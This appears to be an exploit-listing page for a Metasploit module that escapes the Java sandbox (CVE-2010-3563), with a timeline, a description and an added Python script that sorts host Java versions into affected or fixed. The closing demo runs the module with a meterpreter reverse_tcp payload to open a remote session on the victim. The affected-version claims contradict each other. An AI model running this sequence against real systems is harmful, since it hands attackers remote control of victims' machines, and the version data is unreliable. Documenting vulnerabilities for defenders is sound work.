Description: Timeline :
Vulnerability reported to vendor by ZDI on 2010-04-05
Coordinated public release of advisory on 2010-10-12
Metasploit exploit released on 2010-11-19
Provided by:
Matthias Kaiser
egypt
References :
CVE-2010-3563
ZDI-10-202
Affected versions :
Java Standard Edition equal or above 6 update 21
Tested on Windows 7 Integral with :
Java Standard Edition 6 update 20
Description:
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to escape the Java sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class, the default Java sandbox policy file can be overwritten. The vulnerability affects version 6 prior to update 22.
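A defender-side check for the range stated above (version 6 prior to update 22), added here as an example; it is not part of the original page or of the Metasploit module. It classifies `java -version` banners collected from hosts. The host names and banners are constructed sample data, and the function names are hypothetical.

```python
import re

# Fixed release as stated on the page: Java SE 6 update 22.
FIXED_MAJOR, FIXED_UPDATE = 6, 22

# Legacy Java version strings look like 1.6.0_20 or 1.6.0_22-b04.
# The lookbehind stops "11.0.2" from being misread as a 1.x version.
_VERSION_RE = re.compile(r'(?<![\d.])1\.(\d+)\.\d+(?:_(\d+))?')


def parse_java_version(banner):
    """Return (major, update) from a `java -version` banner, or None."""
    match = _VERSION_RE.search(banner)
    if not match:
        return None
    # A banner without "_NN" is the initial release, i.e. update 0.
    return int(match.group(1)), int(match.group(2) or 0)


def classify(banner):
    """Classify one banner against the range given on the page."""
    parsed = parse_java_version(banner)
    if parsed is None:
        return "unparsed"       # review by hand, do not assume safe
    major, update = parsed
    if major != FIXED_MAJOR:
        return "out_of_scope"   # the page only makes a claim about version 6
    return "affected" if update < FIXED_UPDATE else "fixed"


def audit(inventory):
    """Map host -> classification for a {host: banner} inventory."""
    return {host: classify(banner) for host, banner in inventory.items()}


# Constructed sample inventory (not real hosts).
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.6.0_20"',
    "ws-02": 'java version "1.6.0_22"\nJava(TM) SE Runtime Environment (build 1.6.0_22-b04)',
    "ws-03": 'java version "1.6.0"',
    "ws-04": 'java version "1.7.0_01"',
    "ws-05": "'java' is not recognized as an internal or external command",
}

if __name__ == "__main__":
    for host, status in sorted(audit(SAMPLE_INVENTORY).items()):
        print(host, status)
```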
Metasploit demo :
use exploit/windows/browser/java_basicservice_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
Tags: metasploit, java, jse, jre, exploit, 0day, hack